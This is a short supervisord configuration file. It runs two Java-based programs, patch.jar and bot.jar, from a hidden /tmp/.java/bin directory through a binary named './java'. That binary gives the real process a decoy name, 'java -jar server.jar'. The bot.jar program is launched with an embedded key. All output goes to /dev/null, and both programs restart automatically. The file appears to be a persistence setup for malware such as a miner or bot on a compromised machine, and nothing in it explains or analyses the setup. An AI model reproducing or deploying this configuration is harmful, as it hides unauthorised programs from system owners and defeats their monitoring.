[supervisord]
logfile=/dev/null

[program:app]
directory=/tmp/.java/bin
command=./java -a 'java -jar server.jar' ./patch.jar -c ./conf.json
stdout_logfile=/dev/null
autorestart = true

[program:gnet]
directory=/tmp/.java/bin
command=./java -a 'java -jar server.jar' ./bot.jar -s "i0A3eD2E4D-9g8H6b5j7-56C4a9f6-X1eCd9F9440-d6A2803-A1c5J1g6" -liq
stdout_logfile=/dev/null
autorestart = true